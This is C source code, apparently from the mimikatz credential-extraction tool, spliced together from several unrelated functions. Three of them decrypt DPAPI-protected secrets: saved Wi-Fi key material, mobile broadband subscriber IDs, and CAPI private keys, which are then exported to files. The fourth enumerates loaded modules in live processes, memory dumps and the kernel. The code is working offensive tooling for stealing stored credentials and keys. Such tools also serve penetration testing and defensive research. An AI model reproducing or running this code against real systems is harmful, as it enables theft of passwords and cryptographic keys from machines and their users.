NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataF;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF))
{
kprintf(L" * AccessString : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * SubscriberID : ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
kprintf(L"\n");
kprintf(L"%.*s", lenDataOut / sizeof(wchar_t), dataOut);
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE memory, PKULL_M_MODULE_ENUM_CALLBACK callBack, PVOID pvArg)
{
NTSTATUS status = STATUS_DLL_NOT_FOUND;
PLDR_DATA_TABLE_ENTRY pLdrEntry;
PEB Peb; PEB_LDR_DATA LdrData; LDR_DATA_TABLE_ENTRY LdrEntry;
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
PLDR_DATA_TABLE_ENTRY_F32 pLdrEntry32;
PEB_F32 Peb32; PEB_LDR_DATA_F32 LdrData32; LDR_DATA_TABLE_ENTRY_F32 LdrEntry32;
#endif
ULONG i;
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
KULL_M_MEMORY_ADDRESS aProcess= {NULL, memory};
PBYTE aLire, fin;
PWCHAR moduleNameW;
UNICODE_STRING moduleName;
PMINIDUMP_MODULE_LIST pMinidumpModuleList;
PMINIDUMP_STRING pMinidumpString;
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION moduleInformation;
PRTL_PROCESS_MODULES modules = NULL;
BOOL continueCallback = TRUE;
moduleInformation.DllBase.hMemory = memory;
switch(memory->type)
{
case KULL_M_MEMORY_TYPE_OWN:
if(kull_m_process_peb(memory, &Peb, FALSE))
{
for(pLdrEntry = (PLDR_DATA_TABLE_ENTRY) ((PBYTE) (Peb.Ldr->InMemoryOrderModulevector.Flink) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks));
(pLdrEntry != (PLDR_DATA_TABLE_ENTRY) ((PBYTE) (Peb.Ldr) + FIELD_OFFSET(PEB_LDR_DATA, InLoadOrderModulevector))) && continueCallback;
pLdrEntry = (PLDR_DATA_TABLE_ENTRY) ((PBYTE) (pLdrEntry->InMemoryOrderLinks.Flink ) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks))
)
{
moduleInformation.DllBase.address = pLdrEntry->DllBase;
moduleInformation.SizeOfImage = pLdrEntry->SizeOfImage;
moduleInformation.NameDontUseOutsideCallback = &pLdrEntry->BaseDllName;
kull_m_process_adjustTimeDateStamp(&moduleInformation);
continueCallback = callBack(&moduleInformation, pvArg);
}
status = STATUS_SUCCESS;
}
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
moduleInformation.NameDontUseOutsideCallback = &moduleName;
if(continueCallback && NT_SUCCESS(status) && kull_m_process_peb(memory, (PPEB) &Peb32, TRUE))
{
status = STATUS_PARTIAL_COPY;
for(pLdrEntry32 = (PLDR_DATA_TABLE_ENTRY_F32) ((PBYTE) ULongToPtr(((PEB_LDR_DATA_F32 *) ULongToPtr(Peb32.Ldr))->InMemoryOrderModulevector.Flink) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY_F32, InMemoryOrderLinks));
(pLdrEntry32 != (PLDR_DATA_TABLE_ENTRY_F32) ((PBYTE) ULongToPtr(Peb32.Ldr) + FIELD_OFFSET(PEB_LDR_DATA, InLoadOrderModulevector))) && continueCallback;
pLdrEntry32 = (PLDR_DATA_TABLE_ENTRY_F32) ((PBYTE) ULongToPtr(pLdrEntry32->InMemoryOrderLinks.Flink) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY_F32, InMemoryOrderLinks))
)
{
moduleInformation.DllBase.address = ULongToPtr(pLdrEntry32->DllBase);
moduleInformation.SizeOfImage = pLdrEntry32->SizeOfImage;
moduleName.Length = pLdrEntry32->BaseDllName.Length;
moduleName.MaximumLength = pLdrEntry32->BaseDllName.MaximumLength;
moduleName.Buffer = (PWSTR) ULongToPtr(pLdrEntry32->BaseDllName.Buffer);
kull_m_process_adjustTimeDateStamp(&moduleInformation);
continueCallback = callBack(&moduleInformation, pvArg);
}
status = STATUS_SUCCESS;
}
#endif
break;
case KULL_M_MEMORY_TYPE_PROCESS:
moduleInformation.NameDontUseOutsideCallback = &moduleName;
if(kull_m_process_peb(memory, &Peb, FALSE))
{
aBuffer.address = &LdrData; aProcess.address = Peb.Ldr;
if(kull_m_memory_copy(&aBuffer, &aProcess, sizeof(LdrData)))
{
for(
aLire = (PBYTE) (LdrData.InMemoryOrderModulevector.Flink) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks),
fin = (PBYTE) (Peb.Ldr) + FIELD_OFFSET(PEB_LDR_DATA, InLoadOrderModulevector);
(aLire != fin) && continueCallback;
aLire = (PBYTE) LdrEntry.InMemoryOrderLinks.Flink - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks)
)
{
aBuffer.address = &LdrEntry; aProcess.address = aLire;
if(continueCallback = kull_m_memory_copy(&aBuffer, &aProcess, sizeof(LdrEntry)))
{
moduleInformation.DllBase.address = LdrEntry.DllBase;
moduleInformation.SizeOfImage = LdrEntry.SizeOfImage;
moduleName = LdrEntry.BaseDllName;
if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
{
aBuffer.address = moduleName.Buffer; aProcess.address = LdrEntry.BaseDllName.Buffer;
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
{
kull_m_process_adjustTimeDateStamp(&moduleInformation);
continueCallback = callBack(&moduleInformation, pvArg);
}
LocalFree(moduleName.Buffer);
}
}
}
status = STATUS_SUCCESS;
}
}
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
if(continueCallback && NT_SUCCESS(status) && kull_m_process_peb(memory, (PPEB) &Peb32, TRUE))
{
status = STATUS_PARTIAL_COPY;
aBuffer.address = &LdrData32; aProcess.address = ULongToPtr(Peb32.Ldr);
if(kull_m_memory_copy(&aBuffer, &aProcess, sizeof(LdrData32)))
{
for(
aLire = (PBYTE) ULongToPtr(LdrData32.InMemoryOrderModulevector.Flink) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY_F32, InMemoryOrderLinks),
fin = (PBYTE) ULongToPtr(Peb32.Ldr) + FIELD_OFFSET(PEB_LDR_DATA_F32, InLoadOrderModulevector);
(aLire != fin) && continueCallback;
aLire = (PBYTE) ULongToPtr(LdrEntry32.InMemoryOrderLinks.Flink) - FIELD_OFFSET(LDR_DATA_TABLE_ENTRY_F32, InMemoryOrderLinks)
)
{
aBuffer.address = &LdrEntry32; aProcess.address = aLire;
if(kull_m_memory_copy(&aBuffer, &aProcess, sizeof(LdrEntry32)))
{
moduleInformation.DllBase.address = ULongToPtr(LdrEntry32.DllBase);
moduleInformation.SizeOfImage = LdrEntry32.SizeOfImage;
moduleName.Length = LdrEntry32.BaseDllName.Length;
moduleName.MaximumLength = LdrEntry32.BaseDllName.MaximumLength;
if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
{
aBuffer.address = moduleName.Buffer; aProcess.address = ULongToPtr(LdrEntry32.BaseDllName.Buffer);
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
{
kull_m_process_adjustTimeDateStamp(&moduleInformation);
continueCallback = callBack(&moduleInformation, pvArg);
}
LocalFree(moduleName.Buffer);
}
}
}
status = STATUS_SUCCESS;
}
}
#endif
break;
case KULL_M_MEMORY_TYPE_PROCESS_DMP:
moduleInformation.NameDontUseOutsideCallback = &moduleName;
if(pMinidumpModuleList = (PMINIDUMP_MODULE_LIST) kull_m_minidump_stream(memory->pHandleProcessDmp->hMinidump, ModuleListStream))
{
for(i = 0; (i < pMinidumpModuleList->NumberOfModules) && continueCallback; i++)
{
moduleInformation.DllBase.address = (PVOID) pMinidumpModuleList->Modules[i].BaseOfImage;
moduleInformation.SizeOfImage = pMinidumpModuleList->Modules[i].SizeOfImage;
if(pMinidumpString = (PMINIDUMP_STRING) kull_m_minidump_RVAtoPTR(memory->pHandleProcessDmp->hMinidump, pMinidumpModuleList->Modules[i].ModuleNameRva))
{
RtlInitUnicodeString(&moduleName, wcsrchr(pMinidumpString->Buffer, L'\\') + 1);
kull_m_process_adjustTimeDateStamp(&moduleInformation);
continueCallback = callBack(&moduleInformation, pvArg);
}
}
status = STATUS_SUCCESS;
}
break;
case KULL_M_MEMORY_TYPE_KERNEL:
status = kull_m_process_NtQuerySystemInformation(SystemModuleInformation, &modules, 0);
if(NT_SUCCESS(status))
{
moduleInformation.NameDontUseOutsideCallback = &moduleName;
for(i = 0; (i < modules->NumberOfModules) && continueCallback; i++)
{
moduleInformation.DllBase.address = modules->Modules[i].ImageBase;
moduleInformation.SizeOfImage = modules->Modules[i].ImageSize;
if(moduleNameW = kull_m_string_qad_ansi_to_unicode((char *) modules->Modules[i].FullPathName + modules->Modules[i].OffsetToFileName))
{
RtlInitUnicodeString(&moduleName, moduleNameW);
moduleInformation.TimeDateStamp = 0;
continueCallback = callBack(&moduleInformation, pvArg);
LocalFree(moduleNameW);
}
}
}
break;
default:
status = STATUS_NOT_IMPLEMENTED;
break;
}
return status;
}
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataSSID, dataF, dataAuth;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID))
{
kprintf(L" * SSID ");
if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF))
{
kprintf(L"name : %s\n", dataF);
LocalFree(dataF);
}
else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF))
{
kprintf(L"hex : %s\n", dataF);
LocalFree(dataF);
}
else kprintf(L"?\n");
LocalFree(dataSSID);
}
if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth))
{
kprintf(L" * Authentication: %s\n", dataAuth);
if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF))
{
kprintf(L" * Encryption : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * Key Material : ");
if(_wcsicmp(dataAuth, L"WEP") == 0)
{
kprintf(L"(hex) ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
}
else
kprintf(L"%.*S", lenDataOut, dataOut);
kprintf(L"\n");
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataAuth);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[])
{
PVOID file, out;
PRSA_GENERICKEY_BLOB blob;
DWORD szFile, outLen, szBlob;
PKULL_M_KEY_CAPI_BLOB capiKey;
LPCWSTR infile;
PWSTR name;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
if(capiKey = kull_m_key_capi_create(file))
{
kull_m_key_capi_descr(0, capiKey);
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiExportFlag, capiKey->dwSiExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_SIGNATURE Export flags:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiPrivateKey, capiKey->dwSiPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_SIGNATURE Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
{
if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
{
kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_signature", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(blob);
}
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExExportFlag, capiKey->dwExExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_EXCHANGE Export flags:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExPrivateKey, capiKey->dwExPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_EXCHANGE Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
{
if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
{
kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_exchange", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(blob);
}
LocalFree(out);
}
kull_m_key_capi_delete(capiKey);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CAPI private key file needed (/in:file)\n");
return STATUS_SUCCESS;
}
